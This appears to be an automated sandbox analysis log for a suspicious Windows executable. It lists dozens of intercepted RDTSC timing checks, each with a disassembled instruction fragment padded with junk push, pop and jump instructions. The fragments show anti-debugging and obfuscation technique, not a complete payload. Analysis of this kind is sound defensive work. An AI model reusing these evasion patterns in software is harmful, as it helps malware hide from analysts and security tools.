Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1177628 second address: 117763E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7C48CABF16h 0x0000000a ja 00007F7C48CABF16h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 117763E second address: 117765E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F7C49018EE2h 0x0000000b pushad 0x0000000c jl 00007F7C49018ED6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11777CA second address: 11777CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11779A1 second address: 11779A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11779A5 second address: 11779EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F7C48CABF24h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7C48CABF1Eh 0x00000016 pushad 0x00000017 jmp 00007F7C48CABF25h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11779EB second address: 1177A00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE0h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1177A00 second address: 1177A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1177CDD second address: 1177CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1177CE1 second address: 1177CE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1177CE9 second address: 1177D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F7C49018ED6h 0x00000014 jmp 00007F7C49018EDFh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11783C6 second address: 11783D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 je 00007F7C48CABF16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11783D7 second address: 11783DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11786BA second address: 11786CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7C48CABF20h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11786CE second address: 11786E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11786E1 second address: 11786E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11786E6 second address: 1178704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7C49018EE0h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 117C2DB second address: 117C2DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1181B7C second address: 1181B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1180652 second address: 118065C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118065C second address: 1180662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1180662 second address: 1180666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118093A second address: 1180940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1180940 second address: 1180944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1180944 second address: 1180963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7C49018EE2h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1180A98 second address: 1180A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1180E82 second address: 1180E8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F7C49018ED6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1180E8D second address: 1180EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F7C48CABF1Bh 0x00000011 popad 0x00000012 pushad 0x00000013 jc 00007F7C48CABF16h 0x00000019 jmp 00007F7C48CABF1Fh 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1180EC0 second address: 1180ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7C49018ED6h 0x0000000a jmp 00007F7C49018EDAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118116A second address: 1181184 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7C48CABF24h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1181495 second address: 118149A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118149A second address: 118149F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1181608 second address: 1181632 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7C49018ED6h 0x00000008 jmp 00007F7C49018EE2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007F7C49018EE8h 0x00000015 je 00007F7C49018EE2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1184616 second address: 118461A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118461A second address: 1184620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11849CF second address: 11849D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1189F2B second address: 1189F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 10ECE23 second address: 10ECE2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118F5F2 second address: 118F5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118F5F8 second address: 118F60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F7C48CABF2Eh 0x0000000b jc 00007F7C48CABF18h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118FAD2 second address: 118FAD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118FBFA second address: 118FC06 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118FC06 second address: 118FC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118FC0A second address: 118FC27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF29h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118FC27 second address: 118FC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118FC2D second address: 118FC44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7C48CABF1Bh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118FC44 second address: 118FC4E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7C49018ED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118FC4E second address: 118FC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F7C48CABF1Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113F94C second address: 113F952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113F952 second address: 113F9B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7C48CABF1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F7C48CABF18h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+12484A10h] 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F7C48CABF18h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 mov edi, dword ptr [ebp+122D2BCFh] 0x0000004d add eax, ebx 0x0000004f movsx edi, dx 0x00000052 nop 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113F9B8 second address: 113F9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 118FED9 second address: 118FEDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1193D0C second address: 1193D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1193D10 second address: 1193D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1193D16 second address: 1193D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1193A2F second address: 1193A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7C48CABF1Dh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1193A43 second address: 1193A4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F7C49018ED6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1193A4F second address: 1193A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1193A53 second address: 1193A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1197BD9 second address: 1197BDF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1196E4B second address: 1196E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7C49018EE5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119711C second address: 1197120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1197120 second address: 119714C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7C49018EDDh 0x0000000d jmp 00007F7C49018EE7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119714C second address: 1197158 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7C48CABF16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119728C second address: 119729C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7C49018EDAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119729C second address: 11972AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7C48CABF1Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11972AD second address: 11972B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11972B2 second address: 11972BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7C48CABF16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11972BE second address: 11972D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F7C49018ED6h 0x0000000d jnc 00007F7C49018ED6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11972D1 second address: 11972E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d je 00007F7C48CABF16h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11972E6 second address: 11972EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11972EE second address: 11972F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1197428 second address: 1197436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F7C49018ED6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1197436 second address: 119743F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119743F second address: 1197449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7C49018ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119755C second address: 1197572 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007F7C48CABF16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F7C48CABF16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1197572 second address: 1197576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1197576 second address: 119757C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1197718 second address: 1197727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7C49018EDAh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1197727 second address: 1197750 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF24h 0x00000007 jc 00007F7C48CABF1Ch 0x0000000d jne 00007F7C48CABF16h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119FE4F second address: 119FE5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F7C49018ED6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119FE5A second address: 119FE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7C48CABF16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7C48CABF20h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119DF86 second address: 119DFA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE1h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F7C49018ED6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119E3AC second address: 119E3B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119E682 second address: 119E686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119EFD2 second address: 119EFD7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119EFD7 second address: 119EFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007F7C49018EDCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119F356 second address: 119F360 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7C48CABF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119F360 second address: 119F377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F7C49018ED6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 119FBAF second address: 119FBD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F7C48CABF52h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A8558 second address: 11A855E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A855E second address: 11A8568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7C48CABF16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A8568 second address: 11A8573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A8573 second address: 11A8579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11A7A85 second address: 11A7AB1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7C49018ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7C49018EDEh 0x00000011 jmp 00007F7C49018EE2h 0x00000016 rdtsc
